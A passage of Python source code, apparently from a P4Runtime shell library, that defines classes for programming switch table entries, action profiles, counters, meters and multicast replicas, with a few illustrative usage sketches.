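    g = ActionProfileGroup("ecmp_selector")(group_id=1)
    g.add(member_id=1).add(member_id=2, weight=2)
    g.insert()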
def _get_action_profile(table_name):
table = context.get_table(table_name)
implementation_id = table.implementation_id
if implementation_id == 0:
return None
try:
implementation_name = context.get_name_from_id(implementation_id)
except KeyError:
raise InvalidP4InfoError(
"Invalid implementation_id {} for table '{}'".format(
implementation_id, table_name))
ap = context.get_obj(P4Type.action_profile, implementation_name)
if ap is None:
raise InvalidP4InfoError("Unknown implementation for table '{}'".format(table_name))
return ap
class OneshotAction:
"""
An action in a oneshot action set.
Construct with OneshotAction(<action (Action instance)>, weight=<weight>, watch=<watch>,
watch_port=<watch_port>).
You can set / get attributes action (required), weight (default 1), watch (default 0),
watch_port (default "").
"""
def __init__(self, action=None, weight=1, watch=0, watch_port=b""):
if action is None:
raise UserError("action is required")
self.action = action
self.weight = weight
self.watch = watch
self.watch_port = watch_port
def __dir__(self):
return ["action", "weight", "watch", "watch_port", "msg"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name == "action":
if not isinstance(value, Action):
raise UserError("action must be an instance of Action")
elif name == "weight":
if type(value) is not int:
raise UserError("weight must be an integer")
elif name == "watch":
if type(value) is not int:
raise UserError("watch must be an integer")
elif name == "watch_port":
if type(value) is not bytes:
raise UserError("watch_port must be a byte string")
super().__setattr__(name, value)
def msg(self):
msg = p4runtime_pb2.ActionProfileAction()
msg.action.CopyFrom(self.action.msg())
msg.weight = self.weight
if self.watch:
msg.watch = self.watch
if self.watch_port:
msg.watch_port = self.watch_port
return msg
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
class Oneshot:
def __init__(self, table_name=None):
self._init = False
if table_name is None:
raise UserError("Please provide table name")
self.table_name = table_name
self.actions = []
self._table_info = P4Objects(P4Type.table)[table_name]
ap = _get_action_profile(table_name)
if not ap:
raise UserError("Cannot create Oneshot instance for a direct table")
if not ap.with_selector:
raise UserError(
"Cannot create Oneshot instance for a table with an action profile "
"without selector")
self.__doc__ = """
A "oneshot" action set for table '{}'.
To add an action to the set, use <self>.add(<Action instance>).
You can also access the set of actions with <self>.actions (which is a Python list).
""".format(self.table_name)
self._init = True
def __dir__(self):
return ["table_name", "actions", "add", "msg"]
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "table_name":
raise UserError("Cannot change table name")
elif name == "actions":
if type(value) is not list:
raise UserError("actions must be a list of OneshotAction objects")
for m in value:
if type(m) is not OneshotAction:
raise UserError("actions must be a list of OneshotAction objects")
if not self._is_valid_action_id(m.action._action_id):
raise UserError("action '{}' is not a valid action for table {}".format(
m.action.action_name, self.table_name))
super().__setattr__(name, value)
def _is_valid_action_id(self, action_id):
for action_ref in self._table_info.action_refs:
if action_id == action_ref.id:
return True
return False
def add(self, action=None, weight=1, watch=0, watch_port=b""):
"""Add an action to the oneshot action set."""
self.actions.append(OneshotAction(action, weight, watch, watch_port))
return self
def msg(self):
msg = p4runtime_pb2.ActionProfileActionSet()
msg.action_profile_actions.extend([action.msg() for action in self.actions])
return msg
def _from_msg(self, msg):
for action in msg.action_profile_actions:
action_name = context.get_name_from_id(action.action.action_id)
a = Action(action_name)
a._from_msg(action.action)
self.actions.append(OneshotAction(a, action.weight, action.watch, action.watch_port))
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
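# Illustrative sketch, not part of the original module: one-shot action selector
# programming. The table 'wcmp_table' and action 'set_nhop' are hypothetical, and
# the table is assumed to be implemented with an action selector.
def _example_oneshot():
    a1 = Action("set_nhop")
    a1["port"] = "1"
    a2 = Action("set_nhop")
    a2["port"] = "2"
    # Two weighted members installed in a single shot, no explicit group needed.
    return Oneshot("wcmp_table").add(a1).add(a2, weight=3).msg()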
class _CounterData:
@staticmethod
def attrs_for_counter_type(counter_type):
attrs = []
if counter_type in {p4info_pb2.CounterSpec.BYTES, p4info_pb2.CounterSpec.BOTH}:
attrs.append("byte_count")
if counter_type in {p4info_pb2.CounterSpec.PACKETS, p4info_pb2.CounterSpec.BOTH}:
attrs.append("packet_count")
return attrs
def __init__(self, counter_name, counter_type):
self._counter_name = counter_name
self._counter_type = counter_type
self._msg = p4runtime_pb2.CounterData()
self._attrs = _CounterData.attrs_for_counter_type(counter_type)
def __dir__(self):
return self._attrs
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name not in self._attrs:
type_name = p4info_pb2._COUNTERSPEC_UNIT.values_by_number[self._counter_type].name
raise UserError("Counter '{}' is of type '{}', you cannot set '{}'".format(
self._counter_name, type_name, name))
if type(value) is not int:
raise UserError("{} must be an integer".format(name))
setattr(self._msg, name, value)
def __getattr__(self, name):
if name == "byte_count" or name == "packet_count":
return getattr(self._msg, name)
raise AttributeError("'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
def msg(self):
return self._msg
def _from_msg(self, msg):
self._msg.CopyFrom(msg)
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
@classmethod
def set_count(cls, instance, counter_name, counter_type, name, value):
if instance is None:
d = cls(counter_name, counter_type)
else:
d = instance
setattr(d, name, value)
return d
@classmethod
def get_count(cls, instance, counter_name, counter_type, name):
if instance is None:
d = cls(counter_name, counter_type)
else:
d = instance
r = getattr(d, name)
return d, r
class _MeterConfig:
@staticmethod
def attrs():
return ["cir", "cburst", "pir", "pburst"]
def __init__(self, meter_name, meter_type):
self._meter_name = meter_name
self._meter_type = meter_type
self._msg = p4runtime_pb2.MeterConfig()
self._attrs = _MeterConfig.attrs()
def __dir__(self):
return self._attrs
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name in self._attrs:
if type(value) is not int:
raise UserError("{} must be an integer".format(name))
setattr(self._msg, name, value)
def __getattr__(self, name):
if name in self._attrs:
return getattr(self._msg, name)
raise AttributeError("'{}' object has no attribute '{}'".format(
self.__class__.__name__, name))
def msg(self):
return self._msg
def _from_msg(self, msg):
self._msg.CopyFrom(msg)
def __str__(self):
return str(self.msg())
def _repr_pretty_(self, p, cycle):
p.text(str(self.msg()))
@classmethod
def set_param(cls, instance, meter_name, meter_type, name, value):
if instance is None:
d = cls(meter_name, meter_type)
else:
d = instance
setattr(d, name, value)
return d
@classmethod
def get_param(cls, instance, meter_name, meter_type, name):
if instance is None:
d = cls(meter_name, meter_type)
else:
d = instance
r = getattr(d, name)
return d, r
class TableEntry(_P4EntityBase):
@enum.unique
class _ActionSpecType(enum.Enum):
NONE = 0
DIRECT_ACTION = 1
MEMBER_ID = 2
GROUP_ID = 3
ONESHOT = 4
@classmethod
def _action_spec_name_to_type(cls, name):
return {
"action": cls._ActionSpecType.DIRECT_ACTION,
"member_id": cls._ActionSpecType.MEMBER_ID,
"group_id": cls._ActionSpecType.GROUP_ID,
"oneshot": cls._ActionSpecType.ONESHOT,
}.get(name, None)
def __init__(self, table_name=None):
super().__init__(
P4Type.table, P4RuntimeEntity.table_entry,
p4runtime_pb2.TableEntry, table_name)
self.match = MatchKey(table_name, self._info.match_fields)
self._action_spec_type = self._ActionSpecType.NONE
self._action_spec = None
self.priority = 0
self.is_default = False
ap = _get_action_profile(table_name)
if ap is None:
self._support_members = False
self._support_groups = False
else:
self._support_members = True
self._support_groups = ap.with_selector
self._direct_counter = None
self._direct_meter = None
for res_id in self._info.direct_resource_ids:
prefix = (res_id & 0xff000000) >> 24
if prefix == p4info_pb2.P4Ids.DIRECT_COUNTER:
self._direct_counter = context.get_obj_by_id(res_id)
elif prefix == p4info_pb2.P4Ids.DIRECT_METER:
self._direct_meter = context.get_obj_by_id(res_id)
self._counter_data = None
self._meter_config = None
self.metadata = b""
self.__doc__ = """
An entry for table '{}'
Use <self>.info to display the P4Info entry for this table.
To set the match key, use <self>.match['<field name>'] = <expr>.
Type <self>.match? for more details.
""".format(table_name)
if self._direct_counter is not None:
self.__doc__ += """
To set the counter spec, use <self>.counter_data.byte_count and/or <self>.counter_data.packet_count.
To unset it, use <self>.counter_data = None or <self>.clear_counter_data().
"""
if self._direct_meter is not None:
self.__doc__ += """
To access the meter config, use <self>.meter_config.<cir|cburst|pir|pburst>.
To unset it, use <self>.meter_config = None or <self>.clear_meter_config().
"""
if ap is None:
self.__doc__ += """
To set the action specification (this is a direct table):
<self>.action = <instance of type Action>.
To set the value of action parameters, use <self>.action['<param name>'] = <expr>.
Type <self>.action? for more details.
"""
if self._support_members:
self.__doc__ += """
Access the member_id with <self>.member_id.
"""
if self._support_groups:
self.__doc__ += """
Or access the group_id with <self>.group_id.
"""
self.__doc__ += """
To set the priority, use <self>.priority = <expr>.
To mark the entry as default, use <self>.is_default = True.
To add metadata to the entry, use <self>.metadata = <expr>.
"""
if ap is None:
self.__doc__ += """
Typical usage to insert a table entry:
t = table_entry['<table_name>'](action='<action_name>')
t.match['<f1>'] = ...
...
t.match['<fN>'] = ...
# OR t.match.set(f1=..., ..., fN=...)
t.action['<p1>'] = ...
...
t.action['<pM>'] = ...
# OR t.action.set(p1=..., ..., pM=...)
t.insert
Typical usage to set the default entry:
t = table_entry['<table_name>'](is_default=True)
t.action['<p1>'] = ...
...
t.action['<pM>'] = ...
# OR t.action.set(p1=..., ..., pM=...)
t.modify
"""
else:
self.__doc__ += """
Typical usage to insert a table entry:
t = table_entry['<table_name>']
t.match['<f1>'] = ...
...
t.match['<fN>'] = ...
# OR t.match.set(f1=..., ..., fN=...)
t.member_id = <expr>
"""
self.__doc__ += """
For information about how to read table entries, use <self>.read?
"""
self._init = True
def __dir__(self):
d = super().__dir__() + [
"match", "priority", "is_default", "metadata",
"clear_action", "clear_match", "clear_counter_data", "clear_meter_config"]
if self._support_groups:
d.extend(["member_id", "group_id", "oneshot"])
elif self._support_members:
d.append("member_id")
else:
d.append("action")
if self._direct_counter is not None:
d.append("counter_data")
if self._direct_meter is not None:
d.append("meter_config")
return d
def __call__(self, **kwargs):
for name, value in kwargs.items():
if name == "action" and type(value) is str:
value = Action(value)
setattr(self, name, value)
return self
def _action_spec_set_member(self, member_id):
if member_id is None:
if self._action_spec_type == self._ActionSpecType.MEMBER_ID:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if type(member_id) is not int:
raise UserError("member_id must be an integer")
if not self._support_members:
raise UserError(
"Table does not have an action profile and therefore does not support members")
super().__setattr__("_action_spec_type", self._ActionSpecType.MEMBER_ID)
super().__setattr__("_action_spec", member_id)
def _action_spec_set_group(self, group_id):
if group_id is None:
if self._action_spec_type == self._ActionSpecType.GROUP_ID:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if type(group_id) is not int:
raise UserError("group_id must be an integer")
if not self._support_groups:
raise UserError(
"Table does not have an action profile with selector "
"and therefore does not support groups")
super().__setattr__("_action_spec_type", self._ActionSpecType.GROUP_ID)
super().__setattr__("_action_spec", group_id)
def _action_spec_set_action(self, action):
if action is None:
if self._action_spec_type == self._ActionSpecType.DIRECT_ACTION:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if not isinstance(action, Action):
raise UserError("action must be an instance of Action")
if self._info.implementation_id != 0:
raise UserError(
"Table has an implementation and therefore does not support direct actions "
"(P4Runtime 1.0 doesn't support writing the default action for indirect tables")
if not self._is_valid_action_id(action._action_id):
raise UserError("action '{}' is not a valid action for this table".format(
action.action_name))
super().__setattr__("_action_spec_type", self._ActionSpecType.DIRECT_ACTION)
super().__setattr__("_action_spec", action)
def _action_spec_set_oneshot(self, oneshot):
if oneshot is None:
if self._action_spec_type == self._ActionSpecType.ONESHOT:
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
return
if not isinstance(oneshot, Oneshot):
raise UserError("oneshot must be an instance of Oneshot")
if not self._support_groups:
raise UserError(
"Table does not have an action profile with selector "
"and therefore does not support oneshot programming")
if self.name != oneshot.table_name:
raise UserError("This Oneshot instance was not created for this table")
super().__setattr__("_action_spec_type", self._ActionSpecType.ONESHOT)
super().__setattr__("_action_spec", oneshot)
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
elif name == "name":
raise UserError("Cannot change table name")
elif name == "priority":
if type(value) is not int:
raise UserError("priority must be an integer")
elif name == "match" and not isinstance(value, MatchKey):
raise UserError("match must be an instance of MatchKey")
elif name == "is_default":
if type(value) is not bool:
raise UserError("is_default must be a boolean")
# TODO(antonin): should we do a better job and handle other cases (a field is set while
# is_default is set to True)?
if value is True and self.match._count() > 0:
print("Clearing match key because entry is now default")
self.match.clear()
elif name == "member_id":
self._action_spec_set_member(value)
return
elif name == "group_id":
self._action_spec_set_group(value)
return
elif name == "oneshot":
self._action_spec_set_oneshot(value)
elif name == "action" and value is not None:
self._action_spec_set_action(value)
return
elif name == "counter_data":
if self._direct_counter is None:
raise UserError("Table has no direct counter")
if value is None:
self._counter_data = None
return
raise UserError("Cannot set 'counter_data' directly")
elif name == "meter_config":
if self._direct_meter is None:
raise UserError("Table has no direct meter")
if value is None:
self._meter_config = None
return
raise UserError("Cannot set 'meter_config' directly")
elif name == "metadata":
if type(value) is not bytes:
raise UserError("metadata must be a byte string")
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "counter_data":
if self._direct_counter is None:
raise UserError("Table has no direct counter")
if self._counter_data is None:
self._counter_data = _CounterData(
self._direct_counter.preamble.name, self._direct_counter.spec.unit)
return self._counter_data
if name == "meter_config":
if self._direct_meter is None:
raise UserError("Table has no direct meter")
if self._meter_config is None:
self._meter_config = _MeterConfig(
self._direct_meter.preamble.name, self._direct_meter.spec.unit)
return self._meter_config
t = self._action_spec_name_to_type(name)
if t is None:
return super().__getattr__(name)
if self._action_spec_type == t:
return self._action_spec
if t == self._ActionSpecType.ONESHOT:
self._action_spec_type = self._ActionSpecType.ONESHOT
self._action_spec = Oneshot(self.name)
return self._action_spec
return None
def _is_valid_action_id(self, action_id):
for action_ref in self._info.action_refs:
if action_id == action_ref.id:
return True
return False
def _from_msg(self, msg):
self.priority = msg.priority
self.is_default = msg.is_default_action
self.metadata = msg.metadata
for mf in msg.match:
mf_name = context.get_mf_name(self.name, mf.field_id)
self.match._mk[mf_name] = mf
if msg.action.HasField('action'):
action = msg.action.action
action_name = context.get_name_from_id(action.action_id)
self.action = Action(action_name)
self.action._from_msg(action)
elif msg.action.HasField('action_profile_member_id'):
self.member_id = msg.action.action_profile_member_id
elif msg.action.HasField('action_profile_group_id'):
self.group_id = msg.action.action_profile_group_id
elif msg.action.HasField('action_profile_action_set'):
self.oneshot = Oneshot(self.name)
self.oneshot._from_msg(msg.action.action_profile_action_set)
if msg.HasField('counter_data'):
self._counter_data = _CounterData(
self._direct_counter.preamble.name, self._direct_counter.spec.unit)
self._counter_data._from_msg(msg.counter_data)
else:
self._counter_data = None
if msg.HasField('meter_config'):
self._meter_config = _MeterConfig(
self._direct_meter.preamble.name, self._direct_meter.spec.unit)
self._meter_config._from_msg(msg.meter_config)
else:
self._meter_config = None
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the appropriate fields unset).
If function is None, returns an iterator. Iterate over it to get all the
table entries (TableEntry instances) returned by the server. Otherwise,
function is applied to all the table entries returned by the server.
For example:
for te in <self>.read():
print(te)
The above code is equivalent to the following one-liner:
<self>.read(lambda te: print(te))
To delete all the entries from a table, simply use:
table_entry['<table_name>'].read(function=lambda x: x.delete())
"""
return super().read(function)
def _update_msg(self):
entry = p4runtime_pb2.TableEntry()
entry.table_id = self.id
entry.match.extend(self.match._mk.values())
entry.priority = self.priority
entry.is_default_action = self.is_default
entry.metadata = self.metadata
if self._action_spec_type == self._ActionSpecType.DIRECT_ACTION:
entry.action.action.CopyFrom(self._action_spec.msg())
elif self._action_spec_type == self._ActionSpecType.MEMBER_ID:
entry.action.action_profile_member_id = self._action_spec
elif self._action_spec_type == self._ActionSpecType.GROUP_ID:
entry.action.action_profile_group_id = self._action_spec
elif self._action_spec_type == self._ActionSpecType.ONESHOT:
entry.action.action_profile_action_set.CopyFrom(self._action_spec.msg())
if self._counter_data is None:
entry.ClearField('counter_data')
else:
entry.counter_data.CopyFrom(self._counter_data.msg())
if self._meter_config is None:
entry.ClearField('meter_config')
else:
entry.meter_config.CopyFrom(self._meter_config.msg())
self._entry = entry
def _validate_msg(self):
if self.is_default and self.match._count() > 0:
raise UserError(
"Match key must be empty for default entry, use <self>.is_default = False "
"or <self>.match.clear (whichever one is appropriate)")
def clear_action(self):
"""Clears the action spec for the TableEntry."""
super().__setattr__("_action_spec_type", self._ActionSpecType.NONE)
super().__setattr__("_action_spec", None)
def clear_match(self):
"""Clears the match spec for the TableEntry."""
self.match.clear()
def clear_counter_data(self):
"""Clear all counter data, same as <self>.counter_data = None"""
self._counter_data = None
def clear_meter_config(self):
"""Clear the meter config, same as <self>.meter_config = None"""
self._meter_config = None
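# Illustrative sketch, not part of the original module: the typical insert /
# default-action / delete-all workflow for a direct table. The table name
# 'ipv4_lpm' and the field / action names are hypothetical placeholders.
def _example_table_entry():
    te = TableEntry("ipv4_lpm")(action="ipv4_forward")
    te.match["hdr.ipv4.dstAddr"] = "10.0.0.0/8"
    te.action["port"] = "1"
    te.insert()
    # Change the table's default action.
    default = TableEntry("ipv4_lpm")(is_default=True, action="drop")
    default.modify()
    # Delete every entry currently installed in the table.
    TableEntry("ipv4_lpm").read(lambda e: e.delete())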
class _CounterEntryBase(_P4EntityBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._counter_type = self._info.spec.unit
self._data = None
def __dir__(self):
return super().__dir__() + _CounterData.attrs_for_counter_type(self._counter_type) + [
"clear_data"]
def __call__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change counter name")
if name == "byte_count" or name == "packet_count":
self._data = _CounterData.set_count(
self._data, self.name, self._counter_type, name, value)
return
if name == "data":
if value is None:
self._data = None
return
raise UserError("Cannot set 'data' directly")
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "byte_count" or name == "packet_count":
self._data, r = _CounterData.get_count(
self._data, self.name, self._counter_type, name)
return r
if name == "data":
if self._data is None:
self._data = _CounterData(self.name, self._counter_type)
return self._data
return super().__getattr__(name)
def _from_msg(self, msg):
self._entry.CopyFrom(msg)
if msg.HasField('data'):
self._data = _CounterData(self.name, self._counter_type)
self._data._from_msg(msg.data)
else:
self._data = None
def _update_msg(self):
if self._data is None:
self._entry.ClearField('data')
else:
self._entry.data.CopyFrom(self._data.msg())
def clear_data(self):
"""Clear all counter data, same as <self>.data = None"""
self._data = None
class CounterEntry(_CounterEntryBase):
def __init__(self, counter_name=None):
super().__init__(
P4Type.counter, P4RuntimeEntity.counter_entry,
p4runtime_pb2.CounterEntry, counter_name,
modify_only=True)
self._entry.counter_id = self.id
self.__doc__ = """
An entry for counter '{}'
Use <self>.info to display the P4Info entry for this counter.
Set the index with <self>.index = <expr>.
To reset it (e.g. for wildcard read), set it to None.
Access byte count and packet count with <self>.byte_count / <self>.packet_count.
To read from the counter, use <self>.read
To write to the counter, use <self>.modify
""".format(counter_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["index", "data"]
def __setattr__(self, name, value):
if name == "index":
if value is None:
self._entry.ClearField('index')
return
if type(value) is not int:
raise UserError("index must be an integer")
self._entry.index.index = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
return self._entry.index.index
return super().__getattr__(name)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
counter entries (CounterEntry instances) returned by the
server. Otherwise, function is applied to all the counter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
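# Illustrative sketch, not part of the original module: reading and resetting one
# cell of an indexed counter. The counter name 'igPortsCounts' is hypothetical and
# assumed to be declared with unit BOTH (bytes and packets).
def _example_counter_entry():
    c = CounterEntry("igPortsCounts")
    c.index = 1
    for cell in c.read():
        print(cell.byte_count, cell.packet_count)
    c.byte_count = 0
    c.packet_count = 0
    c.modify()  # counters are modify-only entities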
class DirectCounterEntry(_CounterEntryBase):
def __init__(self, direct_counter_name=None):
super().__init__(
P4Type.direct_counter, P4RuntimeEntity.direct_counter_entry,
p4runtime_pb2.DirectCounterEntry, direct_counter_name,
modify_only=True)
self._direct_table_id = self._info.direct_table_id
try:
self._direct_table_name = context.get_name_from_id(self._direct_table_id)
except KeyError:
raise InvalidP4InfoError("direct_table_id {} is not a valid table id".format(
self._direct_table_id))
self._table_entry = TableEntry(self._direct_table_name)
self.__doc__ = """
An entry for direct counter '{}'
Use <self>.info to display the P4Info entry for this direct counter.
Set the table_entry with <self>.table_entry = <TableEntry instance>.
The TableEntry instance must be for the table to which the direct counter is attached.
To reset it (e.g. for wildcard read), set it to None. It is the same as:
<self>.table_entry = TableEntry({})
Access byte count and packet count with <self>.byte_count / <self>.packet_count.
To read from the counter, use <self>.read
To write to the counter, use <self>.modify
""".format(direct_counter_name, self._direct_table_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["table_entry"]
def __setattr__(self, name, value):
if name == "index":
raise UserError("Direct counters are not index-based")
if name == "table_entry":
if value is None:
self._table_entry = TableEntry(self._direct_table_name)
return
if not isinstance(value, TableEntry):
raise UserError("table_entry must be an instance of TableEntry")
if value.name != self._direct_table_name:
raise UserError("This DirectCounterEntry is for table '{}'".format(
self._direct_table_name))
self._table_entry = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
raise UserError("Direct counters are not index-based")
if name == "table_entry":
return self._table_entry
return super().__getattr__(name)
def _update_msg(self):
super()._update_msg()
if self._table_entry is None:
self._entry.ClearField('table_entry')
else:
self._entry.table_entry.CopyFrom(self._table_entry.msg())
def _from_msg(self, msg):
super()._from_msg(msg)
if msg.HasField('table_entry'):
self._table_entry._from_msg(msg.table_entry)
else:
self._table_entry = None
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
direct counter entries (DirectCounterEntry instances) returned by the
server. Otherwise, function is applied to all the direct counter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
class _MeterEntryBase(_P4EntityBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._meter_type = self._info.spec.unit
self._config = None
def __dir__(self):
return super().__dir__() + _MeterConfig.attrs() + ["clear_config"]
def __call__(self, **kwargs):
for name, value in kwargs.items():
setattr(self, name, value)
return self
def __setattr__(self, name, value):
if name[0] == "_" or not self._init:
super().__setattr__(name, value)
return
if name == "name":
raise UserError("Cannot change meter name")
if name in _MeterConfig.attrs():
self._config = _MeterConfig.set_param(
self._config, self.name, self._meter_type, name, value)
return
if name == "config":
if value is None:
self._config = None
return
raise UserError("Cannot set 'config' directly")
super().__setattr__(name, value)
def __getattr__(self, name):
if name in _MeterConfig.attrs():
self._config, r = _MeterConfig.get_param(
self._config, self.name, self._meter_type, name)
return r
if name == "config":
if self._config is None:
self._config = _MeterConfig(self.name, self._meter_type)
return self._config
return super().__getattr__(name)
def _from_msg(self, msg):
self._entry.CopyFrom(msg)
if msg.HasField('config'):
self._config = _MeterConfig(self.name, self._meter_type)
self._config._from_msg(msg.config)
else:
self._config = None
def _update_msg(self):
if self._config is None:
self._entry.ClearField('config')
else:
self._entry.config.CopyFrom(self._config.msg())
def clear_config(self):
"""Clear the meter config, same as <self>.config = None"""
self._config = None
class MeterEntry(_MeterEntryBase):
def __init__(self, meter_name=None):
super().__init__(
P4Type.meter, P4RuntimeEntity.meter_entry,
p4runtime_pb2.MeterEntry, meter_name,
modify_only=True)
self._entry.meter_id = self.id
self.__doc__ = """
An entry for meter '{}'
Use <self>.info to display the P4Info entry for this meter.
Set the index with <self>.index = <expr>.
To reset it (e.g. for wildcard read), set it to None.
Access meter rates and burst sizes with:
<self>.cir
<self>.cburst
<self>.pir
<self>.pburst
To read from the meter, use <self>.read
To write to the meter, use <self>.modify
""".format(meter_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["index", "config"]
def __setattr__(self, name, value):
if name == "index":
if value is None:
self._entry.ClearField('index')
return
if type(value) is not int:
raise UserError("index must be an integer")
self._entry.index.index = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
return self._entry.index.index
return super().__getattr__(name)
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
meter entries (MeterEntry instances) returned by the
server. Otherwise, function is applied to all the meter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
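# Illustrative sketch, not part of the original module: configuring one cell of an
# indexed meter. The meter name 'port_meter' and the rate/burst values are
# hypothetical; their meaning depends on the meter's declared unit (bytes or packets).
def _example_meter_entry():
    m = MeterEntry("port_meter")
    m.index = 3
    m.cir, m.cburst = 1000, 100  # committed information rate / burst size
    m.pir, m.pburst = 2000, 200  # peak information rate / burst size
    m.modify()
    m.index = None  # reset the index for a wildcard read of every cell
    for cell in m.read():
        print(cell)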
class DirectMeterEntry(_MeterEntryBase):
def __init__(self, direct_meter_name=None):
super().__init__(
P4Type.direct_meter, P4RuntimeEntity.direct_meter_entry,
p4runtime_pb2.DirectMeterEntry, direct_meter_name,
modify_only=True)
self._direct_table_id = self._info.direct_table_id
try:
self._direct_table_name = context.get_name_from_id(self._direct_table_id)
except KeyError:
raise InvalidP4InfoError("direct_table_id {} is not a valid table id".format(
self._direct_table_id))
self._table_entry = TableEntry(self._direct_table_name)
self.__doc__ = """
An entry for direct meter '{}'
Use <self>.info to display the P4Info entry for this direct meter.
Set the table_entry with <self>.table_entry = <TableEntry instance>.
The TableEntry instance must be for the table to which the direct meter is attached.
To reset it (e.g. for wildcard read), set it to None. It is the same as:
<self>.table_entry = TableEntry({})
Access meter rates and burst sizes with:
<self>.cir
<self>.cburst
<self>.pir
<self>.pburst
To read from the meter, use <self>.read
To write to the meter, use <self>.modify
""".format(direct_meter_name, self._direct_table_name)
self._init = True
def __dir__(self):
return super().__dir__() + ["table_entry"]
def __setattr__(self, name, value):
if name == "index":
raise UserError("Direct meters are not index-based")
if name == "table_entry":
if value is None:
self._table_entry = TableEntry(self._direct_table_name)
return
if not isinstance(value, TableEntry):
raise UserError("table_entry must be an instance of TableEntry")
if value.name != self._direct_table_name:
raise UserError("This DirectMeterEntry is for table '{}'".format(
self._direct_table_name))
self._table_entry = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "index":
raise UserError("Direct meters are not index-based")
if name == "table_entry":
return self._table_entry
return super().__getattr__(name)
def _update_msg(self):
super()._update_msg()
if self._table_entry is None:
self._entry.ClearField('table_entry')
else:
self._entry.table_entry.CopyFrom(self._table_entry.msg())
def _from_msg(self, msg):
super()._from_msg(msg)
if msg.HasField('table_entry'):
self._table_entry._from_msg(msg.table_entry)
else:
self._table_entry = None
def read(self, function=None):
"""Generate a P4Runtime Read RPC. Supports wildcard reads (just leave
the index unset).
If function is None, returns an iterator. Iterate over it to get all the
direct meter entries (DirectMeterEntry instances) returned by the
server. Otherwise, function is applied to all the direct meter entries
returned by the server.
For example:
for c in <self>.read():
print(c)
The above code is equivalent to the following one-liner:
<self>.read(lambda c: print(c))
"""
return super().read(function)
class P4RuntimeEntityBuilder:
def __init__(self, obj_type, entity_type, entity_cls):
self._obj_type = obj_type
self._names = sorted([name for name, _ in context.get_objs(obj_type)])
self._entity_type = entity_type
self._entity_cls = entity_cls
self.__doc__ = """Construct a {} entity
Usage: <var> = {}["<{} name>"]
This is equivalent to <var> = {}(<{} name>)
Use command '{}' to see list of {}
""".format(entity_cls.__name__, entity_type.name, obj_type.pretty_name,
entity_cls.__name__, obj_type.pretty_name,
obj_type.p4info_name, obj_type.pretty_names)
def _ipython_key_completions_(self):
return self._names
def __getitem__(self, name):
obj = context.get_obj(self._obj_type, name)
if obj is None:
raise UserError("{} '{}' does not exist".format(
self._obj_type.pretty_name, name))
return self._entity_cls(name)
def __setitem__(self, name, value):
raise UserError("Operation not allowed")
def _repr_pretty_(self, p, cycle):
p.text(self.__doc__)
def __str__(self):
return "Construct a {} entity".format(self.entity_cls.__name__)
class Replica:
"""
A port "replica" (port number + instance id) used for multicast and clone session programming.
Construct with Replica(egress_port, instance=<instance>).
You can set / get attributes egress_port (required), instance (default 0).
"""
def __init__(self, egress_port=None, instance=0):
if egress_port is None:
raise UserError("egress_port is required")
self._msg = p4runtime_pb2.Replica()
self._msg.egress_port = egress_port
self._msg.instance = instance
def __dir__(self):
return ["port", "egress_port", "instance"]
def __setattr__(self, name, value):
if name[0] == "_":
super().__setattr__(name, value)
return
if name == "egress_port" or name == "port":
if type(value) is not int:
raise UserError("egress_port must be an integer")
self._msg.egress_port = value
return
if name == "instance":
if type(value) is not int:
raise UserError("instance must be an integer")
self._msg.instance = value
return
super().__setattr__(name, value)
def __getattr__(self, name):
if name == "egress_port" or name == "port":
return self._msg.egress_port
if name == "instance":
return self._msg.instance
return super().__getattr__(name)
def __str__(self):
return str(self._msg)
def _repr_pretty_(self, p, cycle):
p.text(str(self._msg))
class MulticastGroupEntry(_EntityBase):
def __init__(self, group_id=0):
super().__init__(
P4RuntimeEntity.packet_replication_engine_entry,
